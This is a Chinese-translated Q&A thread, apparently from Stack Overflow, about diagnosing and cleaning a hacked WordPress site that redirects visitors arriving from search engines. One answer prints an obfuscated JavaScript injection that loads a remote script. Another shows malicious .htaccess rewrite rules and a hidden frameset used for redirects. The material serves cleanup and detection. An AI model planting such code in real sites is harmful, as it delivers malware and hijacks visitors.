谷歌搜索后页面重定向 - Wordpress 网站被黑

Posted 2023-02-19

【中文标题】谷歌搜索后页面重定向 - Wordpress 网站被黑

【英文标题】：page redirect after Google search - Wordpress site hacked

【发布时间】：2014-05-10 13:44:59

【问题描述】：

我们有页面域..，当您在 google.nl 搜索到关键对齐并单击该站点的主页时，几秒钟后您将被重定向到 http://www.venusfactor.com/welcome/。我们认为该网站已被黑客入侵，但找不到重定向或任何东西。

有人可以帮忙吗？

【参考方案1】：

您是否检查过是否在托管域的位置进行了重定向？不知道您使用的是哪种主机，但可能该域已设置为从主机端重定向到该页面。

【参考方案2】：

当您的网站被黑客入侵时该怎么做的一个很好的指南是：http://codex.wordpress.org/FAQ_My_site_was_hacked

对于您的问题，请先检查 .htaccess。文件的最右侧可能有一些重定向行，因此请使用水平滚动条。

另外，我建议与您的主机核实，因为可能有更多文件受到影响。

【讨论】：

感谢您的回复，我们确实查看了 htacces，但里面什么也没有。我现在正在下载该站点以查看其他文档。您是否有其他文件您认为可能会导致问题？当我查看页面的代码时，我找不到任何东西

现在好像修好了？它不再重定向我。另外，我记得它在短暂延迟后重定向。这可能意味着使用 javascript 进行重定向。检查您的 .js 文件中是否有类似“window.location.href”

是的，我看到 de index.php 和其他文件中有额外的代码。通过 Sucuri.net 检查显示它有恶意软件，但不知道哪些文件也有问题。你知道有一种方法可以检查哪些文件是错误的吗？

如果您可以访问 SSH 并且知道如何使用它，那么我建议您检查最后修改的文件 (***.com/a/1404964/395160) 或搜索包含该字符串（或部分）的文件其中）你在那个 index.php 文件中找到了（***.com/a/8010605/395160）。如果您不擅长 SSH，请下载 mythicsoft.com/agentransack 并在您之前下载的文件中检查该字符串

【参考方案3】：

同样的事情也发生在我身上。

首先我认为这是一个 DNS hack 问题，因为它是一个重定向问题。托管公司回复我说 DNS 没有问题。 Tey 检查了其他常见问题以找到重定向的来源，我被告知在活动主题文件夹中的 header.php 文件中有一个恶意脚本。

我在 cPanel 中手动检查了文件，并找到了导致重定向的脚本。要了解有关此的更多信息，请查看IStartBlogging上的文章

【参考方案4】：

一种新病毒正在传播，它滥用 wordpress 的 xmlrpc.php 将自己注入服务器并用自己的受污染副本替换 javascript 文件。

如果您看到太多 xmlrpc 请求来自可疑 IP 地址的 POST 请求，如下所示，请验证您的 javascript 文件的完整性。

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

该病毒的一个关键特征是，它主要针对 jQuery.js，将其替换为自己的版本（当用户浏览您的网站时，自动将他们重定向到点击诱饵文章）。

它通过首先发布一个新的 php 文件来实现这一点，例如 recure.php 通常包含混淆的 php 代码，或者将 wordpress 插件上传到上传文件夹。

【参考方案5】：

如果引用的页面是 google、yahoo、msn、aol、bing，则攻击者很可能试图将页面重定向到不同的网站。 当我们从上面指定的引荐中请求页面时，他们将返回一个框架集（类似于 iframe）。

 <frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
        <frame src="http://remote_site_address_here" noresize="" scrolling="auto">
        <link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>

所以我们会在地址栏顶部看到我们的网站名称，但网站内容会有所不同。这些是黑客用来注入可疑代码的常用文件。

index.php index.html header.php footer.php functions.php 主题文件 .htaccess

现在最近感染的案例显示恶意代码注入是使用 .htaccess 文件。这里我演示注入的 .htaccess 文件。 打开 Web 根目录中的 .htaccess 文件。你可以看到这个配置

RewriteEngine On
RewriteCond %HTTP_USER_AGENT (google|yahoo|msn|aol|bing) [OR]
RewriteCond %HTTP_REFERER (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]

如果推荐页面是 google|yahoo|msn|aol|bing，他们会在此处重定向到恶意 php 文件 emilie-amethyst.php。这就是重定向问题的原因。 因此，您必须从 .htaccess 文件中删除此重定向配置，并删除恶意脚本（在本例中为 emilie-amethyst.php）。

尝试点击谷歌搜索中的链接。不过，如果您发现问题，请删除与此特定站点相关的所有 cookie 并重试。它应该可以解决问题